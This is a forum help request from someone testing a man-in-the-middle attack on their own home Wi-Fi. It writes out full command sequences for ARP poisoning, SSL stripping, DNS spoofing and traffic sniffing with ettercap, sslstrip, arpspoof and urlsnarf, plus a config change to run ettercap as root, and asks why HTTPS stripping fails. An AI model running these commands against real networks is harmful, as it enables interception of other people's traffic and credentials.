I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-Bit Kali), by means of ARP-poisoning the communication between my router and my targetted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof.
I am using a combination of the following:
- SSLStrip
- Ettercap (with the dns_spoof plugin enabled).
- urlsnarf
- Wireshark (for examining post-test PCAP results)
The commands I perform are as follows:
Code:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/sslstrip.log
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i wlan0 | grep http > /root/session.txt
# 192.168.2.1 = router, 192.168.2.130 = Macbook Air
echo 1 > /proc/sys/net/ipv4/ip_forward; ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/
ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/
# This runs for a while,I then stop manually... and then clean up and examine results in Wireshark
wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/session.eci
I am able to intercept and decode http packets just fine. Unfortunately, I've had little success in capturing redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/. Instead, what happens is I will receive an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari), a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; just resolves the domain as it should. (see my /etc/ettercap/etter.dns configuration below).
I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534)
Code:
. . .
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
. . .
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
. . .
Alternatively, for a simple dnsspoof, I've tried a simple combination of arpsoof + dnsspoof. Doesn't work either.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1
dnsspoof -i wlan0 -f /root/hosts.txt
I've Googled for a few days now, but after reading post-upon-post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below...
Any help would be greatly appreciated.
Thanks,